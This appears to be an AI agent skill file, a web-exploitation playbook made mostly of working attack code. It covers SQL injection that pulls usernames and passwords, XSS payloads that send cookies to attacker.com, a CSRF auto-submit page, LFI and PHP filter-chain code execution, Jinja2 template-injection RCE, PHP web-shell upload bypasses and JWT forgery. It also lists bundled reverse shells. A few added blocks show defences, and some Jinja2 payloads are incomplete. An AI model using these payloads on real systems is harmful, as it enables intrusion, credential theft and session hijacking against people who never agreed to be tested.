web-exploits

Web Exploitation Patterns

When to Use

Load this skill when:
  • Testing web applications for vulnerabilities
  • Exploiting SQL injection, XSS, or CSRF
  • Bypassing file upload restrictions
  • Testing for LFI/RFI (Local/Remote File Inclusion)
  • Exploiting SSTI (Server-Side Template Injection)
  • Manipulating JWT tokens
  • Analyzing web traffic with Burp Suite

SQL Injection

Detection and Exploitation

```python
import requests

url = "http://TARGET/login"  # placeholder: login endpoint of the application under test

# Test for SQL injection
payloads = [
    "'",
    "' OR '1'='1",
    "' OR '1'='1'--",
    "' OR '1'='1' /*",
    "admin' --",
    "admin' #",
    "' UNION SELECT NULL--",
]

for payload in payloads:
    response = requests.post(url, data={'username': payload, 'password': 'test'})
    # A database error message leaking into the response points to unsanitized input
    if "error" in response.text or "mysql" in response.text.lower():
        print(f"[!] Vulnerable to: {payload}")
```

Union-Based SQLi

```python
import requests

# Step 1: Find number of columns
for i in range(1, 20):
    payload = f"' UNION SELECT {','.join(['NULL'] * i)}--"
    response = requests.get(f"{url}?id={payload}")
    if "error" not in response.text:
        print(f"[+] Number of columns: {i}")
        break

# Step 2: Extract data (these assume three columns were found in step 1)
payloads = [
    "' UNION SELECT 1,version(),3--",
    "' UNION SELECT 1,database(),3--",
    "' UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema=database()--",
    "' UNION SELECT 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_name='users'--",
    "' UNION SELECT 1,group_concat(username,0x3a,password),3 FROM users--",
]
```

Blind SQLi

```python
import time
import requests

# Time-based blind SQLi
def time_based_sqli(url, param):
    """Check if parameter is vulnerable to time-based SQLi"""
    payload = "' AND SLEEP(5)--"
    start = time.time()
    response = requests.get(f"{url}?{param}={payload}")
    elapsed = time.time() - start

    # Network jitter can also delay a response: repeat before drawing a conclusion
    if elapsed >= 5:
        print(f"[+] Time-based SQLi confirmed on {param}")
        return True
    return False

# Boolean-based blind SQLi
def boolean_based_sqli(url):
    """Extract data character by character"""
    result = ""
    for i in range(1, 100):  # Max 100 characters
        for c in range(32, 127):  # ASCII printable
            payload = f"' AND ASCII(SUBSTRING(database(),{i},1))={c}--"
            response = requests.get(f"{url}?id={payload}")
            if "Welcome" in response.text:  # Success indicator
                result += chr(c)
                print(f"[+] Found: {result}")
                break
        else:
            break  # No character matched at this position: end of the string
    return result
```
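As an added example (not code from the original skill), the login bypass that the payload list above probes, reproduced against an in-memory SQLite table next to the parameterized query that closes it. The table, the credentials and the `login_*` function names are constructed for the demo.

```python
import sqlite3

def make_db():
    """Constructed demo table: one account, so a correct login is possible."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 's3cret')")
    return conn

def login_vulnerable(conn, username, password):
    """String-built query: a quote ends the literal and -- comments out the rest."""
    query = (f"SELECT COUNT(*) FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    try:
        return conn.execute(query).fetchone()[0] > 0
    except sqlite3.Error:
        # A database error on a lone quote is exactly the signal the
        # detection loop above looks for in the response body.
        return False

def login_safe(conn, username, password):
    """Parameterized query: the input is bound as data, never parsed as SQL."""
    query = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone()[0] > 0

# Payloads from the list above. "' OR '1'='1" without a trailing comment does
# not bypass here: AND binds tighter than OR, so the password clause stays.
PAYLOADS = ["'", "' OR '1'='1", "' OR '1'='1'--", "admin' --"]

def compare(payloads=PAYLOADS, password="test"):
    """Map each payload to (concatenated-query result, parameterized result)."""
    conn = make_db()
    return {p: (login_vulnerable(conn, p, password), login_safe(conn, p, password))
            for p in payloads}

if __name__ == "__main__":
    for p, (vuln, safe) in compare().items():
        print(repr(p), "concatenated:", vuln, "parameterized:", safe)
```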

Cross-Site Scripting (XSS)

Reflected XSS

```javascript
// Basic payloads
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<iframe src="javascript:alert(1)">

// Bypass filters
<scr<script>ipt>alert(1)</scr</script>ipt>
<img src=x onerror="alert(String.fromCharCode(88,83,83))">
<svg/onload=alert(1)>

// Extract cookies
<script>fetch('http://attacker.com/?c='+document.cookie)</script>
<img src=x onerror="location='http://attacker.com/?c='+document.cookie">
```

Stored XSS

```python
import requests

# Test stored XSS
xss_payloads = [
    "<script>alert(1)</script>",
    "<img src=x onerror=alert(1)>",
    "<svg onload=alert(1)>",
    '"><script>alert(1)</script>',
    "';alert(1);//",
]

for payload in xss_payloads:
    # Submit payload
    requests.post(url + "/comment", data={'text': payload})

    # Check whether the payload comes back unencoded; actual execution
    # still has to be confirmed in a browser
    response = requests.get(url + "/comments")
    if payload in response.text:
        print(f"[+] Stored XSS: {payload}")
```

CSRF (Cross-Site Request Forgery)

```html
<!-- CSRF PoC for form submission -->
<html>
  <body>
    <form action="https://target.com/change_password" method="POST">
      <input type="hidden" name="new_password" value="hacked123" />
      <input type="hidden" name="confirm_password" value="hacked123" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
```

```python
import requests

# Test CSRF protection
session = requests.Session()

# Login first
session.post(url + "/login", data={'user': 'admin', 'pass': 'admin'})

# Try action without token
response = session.post(url + "/delete_user", data={'id': '1'})
# A 200 alone is weak evidence (error pages return 200 too): confirm the action took effect
if response.status_code == 200:
    print("[!] No CSRF protection!")
```

Local File Inclusion (LFI)

Path Traversal

```python
import requests

# Common LFI payloads
lfi_payloads = [
    "../../../../../etc/passwd",
    "....//....//....//....//etc/passwd",
    "..%2F..%2F..%2F..%2Fetc%2Fpasswd",
    "..../..../..../..../etc/passwd",
    "/etc/passwd",
    "php://filter/convert.base64-encode/resource=index.php",
    "expect://whoami",
    "data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7",
]

for payload in lfi_payloads:
    response = requests.get(f"{url}?page={payload}")
    if "root:" in response.text or "<?php" in response.text:
        print(f"[+] LFI found: {payload}")
```

PHP Filter Chain (RCE)

```python
import requests

# Use php://filter to achieve RCE
filter_chain = "php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|"
filter_chain += "convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16|"
# ... (full chain truncated for brevity)
filter_chain += "resource=data://,<?php system($_GET['cmd']); ?>"
response = requests.get(f"{url}?page={filter_chain}&cmd=whoami")
```

Server-Side Template Injection (SSTI)

Detection

```python
import requests

# Test payloads for common template engines
ssti_tests = {
    'Jinja2': "{{7*7}}",           # Python (Flask)
    'Twig': "{{7*7}}",             # PHP
    'ERB': "<%= 7*7 %>",           # Ruby
    'Smarty': "{7*7}",             # PHP
    'Velocity': "#set($x=7*7)$x",  # Java
}

for engine, payload in ssti_tests.items():
    response = requests.get(f"{url}?name={payload}")
    # The expression was evaluated server-side if its result comes back
    # ("49" can occur elsewhere in a page, so verify with a second expression)
    if "49" in response.text:
        print(f"[+] {engine} SSTI detected!")
```

Jinja2 Exploitation

```python
# Read file (the __subclasses__() index is environment-specific; the call
# argument was lost in extraction and is left as "...")
payload = "{{ ''.__class__.__mro__[1].__subclasses__()[40](...).read() }}"

# RCE (Python 2)
payload = "{{ ''.__class__.__mro__[2].__subclasses__()[40](...).write('#!/bin/bash\nid') }}"

# RCE (Python 3)
payload = "{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}"
```

File Upload Bypass

Extension Bypass

```python
import requests

# Test various extensions
extensions = [
    'php', 'php3', 'php4', 'php5', 'phtml', 'pht',
    'php.jpg', 'php.png', 'php;.jpg',
    'php%00.jpg',  # Null byte injection
]

for ext in extensions:
    filename = f"shell.{ext}"
    files = {'file': (filename, "<?php system($_GET['cmd']); ?>", 'application/x-php')}
    response = requests.post(url + "/upload", files=files)

    if response.status_code == 200:
        print(f"[+] Uploaded: {filename}")
```

Content-Type Bypass

```python
import requests

# Try different MIME types
content_types = [
    'image/jpeg',
    'image/png',
    'image/gif',
    'application/octet-stream',
]

for ctype in content_types:
    files = {'file': ('shell.php', "<?php system($_GET['cmd']); ?>", ctype)}
    response = requests.post(url + "/upload", files=files)
```

Magic Bytes Bypass

```python
import requests

# Add GIF header to bypass file type checks
content = b"GIF89a" + b"<?php system($_GET['cmd']); ?>"
files = {'file': ('shell.php', content, 'image/gif')}
response = requests.post(url + "/upload", files=files)
```
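As an added example (not part of the original skill), a server-side upload check that rejects every bypass filename from the three sections above and shows where the magic-byte check stops helping. The allowlist, the executable-extension blocklist and the `validate_*`/`storage_name` helpers are assumptions for the demo.

```python
import re
import secrets

# Assumed upload policy for the demo: only these image types are accepted,
# and a script extension may not appear in any part of the name.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}
EXECUTABLE_EXTENSIONS = {"php", "php3", "php4", "php5", "phtml", "pht", "phar"}
MAGIC = {  # leading bytes expected for each allowed type
    "jpg": (b"\xff\xd8\xff",), "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",), "gif": (b"GIF87a", b"GIF89a"),
}

def validate_filename(filename):
    """Return (ok, reason); every dotted segment is checked, not only the last."""
    # Plain ASCII names only: one test rejects the raw null byte, a literal
    # '%00', the ';' trick, path separators and a missing extension.
    if not re.fullmatch(r"[A-Za-z0-9_-]+(\.[A-Za-z0-9_-]+)+", filename):
        return False, "disallowed characters or missing extension"
    parts = filename.lower().split(".")
    # 'shell.php.jpg': some servers execute on the first extension they
    # recognise, so a script extension anywhere in the name is rejected.
    if any(p in EXECUTABLE_EXTENSIONS for p in parts[1:]):
        return False, "executable extension in name"
    if parts[-1] not in ALLOWED_EXTENSIONS:
        return False, "extension not in allowlist"
    return True, "ok"

def validate_upload(filename, content):
    """Filename policy plus a magic-byte check against the declared type."""
    ok, reason = validate_filename(filename)
    if not ok:
        return ok, reason
    if not content.startswith(MAGIC[filename.lower().rsplit(".", 1)[1]]):
        return False, "content does not match extension"
    # A 'GIF89a<?php ...' polyglot gets this far, so the magic check is not
    # the last line of defence: the file is stored under storage_name() outside
    # the web root, where nothing hands it to a script interpreter.
    return True, "ok"

def storage_name(filename):
    """Server-chosen random name that keeps only the validated extension."""
    return f"{secrets.token_hex(16)}.{filename.lower().rsplit('.', 1)[1]}"

if __name__ == "__main__":
    for name in ["shell.php", "shell.php.jpg", "shell.php;.jpg",
                 "shell.php%00.jpg", "photo.jpg"]:
        print(name, "->", validate_filename(name))
    print(validate_upload("shell.gif", b"GIF89a<?php system($_GET['cmd']); ?>"))
```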

JWT Token Manipulation

```python
import jwt
import base64

# Decode JWT without checking the signature (inspect the claims only)
token = "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9..."
decoded = jwt.decode(token, options={"verify_signature": False})
print(decoded)

# None algorithm attack (JWT segments are base64url, not standard base64)
header = base64.urlsafe_b64encode(b'{"typ":"JWT","alg":"none"}').rstrip(b'=')
payload = base64.urlsafe_b64encode(b'{"user":"admin"}').rstrip(b'=')
forged_token = header + b'.' + payload + b'.'

# Weak secret bruteforce
with open('wordlists/common.txt') as f:
    for secret in f:
        secret = secret.strip()
        try:
            jwt.decode(token, secret, algorithms=['HS256'])
            print(f"[+] Found secret: {secret}")
            break
        except jwt.InvalidTokenError:
            continue
```
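As an added example (not code from the original skill), a standard-library HS256 verifier in the two forms the none-algorithm attack above distinguishes: one that lets the token choose its algorithm and one that pins it server-side. `DEMO_KEY`, the claims and the function names are constructed for the demo.

```python
import base64
import hashlib
import hmac
import json

DEMO_KEY = b"demo-signing-key"  # constructed for the example

def b64url_encode(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=")

def b64url_decode(data):
    return base64.urlsafe_b64decode(data + b"=" * (-len(data) % 4))

def sign_hs256(claims, key):
    """Issue a correctly signed HS256 token (what the server hands out)."""
    header = b64url_encode(b'{"typ":"JWT","alg":"HS256"}')
    payload = b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(key, header + b"." + payload, hashlib.sha256).digest()
    return header + b"." + payload + b"." + b64url_encode(sig)

def unsigned_token(claims):
    """The alg=none token built in the section above, in base64url form."""
    header = b64url_encode(b'{"typ":"JWT","alg":"none"}')
    return header + b"." + b64url_encode(json.dumps(claims).encode()) + b"."

def verify_trusting_header(token, key):
    """Flawed: honours the token's own 'alg', so 'none' skips the signature."""
    header, payload, sig = token.split(b".")
    alg = json.loads(b64url_decode(header)).get("alg")
    if alg == "none":
        return json.loads(b64url_decode(payload))
    expected = hmac.new(key, header + b"." + payload, hashlib.sha256).digest()
    if alg == "HS256" and hmac.compare_digest(b64url_encode(expected), sig):
        return json.loads(b64url_decode(payload))
    return None

def verify_pinned(token, key):
    """Hardened: algorithm fixed server-side, HMAC always checked in constant time."""
    try:
        header, payload, sig = token.split(b".")
    except ValueError:
        return None
    if json.loads(b64url_decode(header)).get("alg") != "HS256":
        return None
    expected = hmac.new(key, header + b"." + payload, hashlib.sha256).digest()
    if not hmac.compare_digest(b64url_encode(expected), sig):
        return None
    return json.loads(b64url_decode(payload))

if __name__ == "__main__":
    forged = unsigned_token({"user": "admin"})
    print("trusting header:", verify_trusting_header(forged, DEMO_KEY))
    print("pinned HS256:   ", verify_pinned(forged, DEMO_KEY))
```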

Quick Reference

| Vulnerability | Detection Pattern | Exploitation |
|---|---|---|
| SQL Injection | `'`, `' OR 1=1--` | `' UNION SELECT ...` |
| XSS | `<script>alert(1)</script>` | Cookie stealing, session hijacking |
| LFI | `../../../etc/passwd` | Read sensitive files, RCE via log poisoning |
| SSTI | `{{7*7}}`, `${7*7}` | RCE via template engine |
| File Upload | Upload `.php`, `.phtml` | Web shell execution |
| CSRF | No token validation | Force user actions |
| JWT | `alg: none`, weak secret | Privilege escalation |

Bundled Resources

Scripts

  • scripts/csrf_grabber.py
    - Extract CSRF tokens automatically
  • scripts/jwt_tamper.py
    - JWT token manipulation tool
  • scripts/lfi_tester.py
    - Automated LFI testing
  • scripts/ssti_tester.py
    - SSTI detection and exploitation
  • scripts/upload_tester.py
    - File upload bypass testing

Payloads

  • payloads/sqli_basic.txt
    - Basic SQL injection payloads
  • payloads/sqli_mysql.txt
    - MySQL-specific payloads
  • payloads/xss_reflected.txt
    - XSS test vectors
  • payloads/ssti_jinja2.txt
    - Jinja2 SSTI payloads
  • payloads/cmd_injection.txt
    - Command injection patterns
  • payloads/lfi.txt
    - LFI/path traversal payloads
  • payloads/ssrf.txt
    - SSRF test URLs
  • payloads/file_upload_bypass.txt
    - Extension bypass techniques

Webshells

  • webshells/php_reverse.php
    - PHP reverse shell
  • webshells/aspx_cmd.aspx
    - ASPX command shell
  • webshells/jsp_cmd.jsp
    - JSP command shell
  • webshells/node_cmd.js
    - Node.js shell

Templates

  • templates/web_requests.py
    - Python requests template with session handling

Wordlists

  • wordlists/
    - Common username/password lists (from SecLists)

Keywords

web exploitation, SQL injection, SQLi, XSS, cross-site scripting, CSRF, LFI, RFI, local file inclusion, SSTI, template injection, file upload, webshell, JWT, JSON web token, command injection, path traversal, directory traversal, web security, OWASP, burp suite, requests, beautifulsoup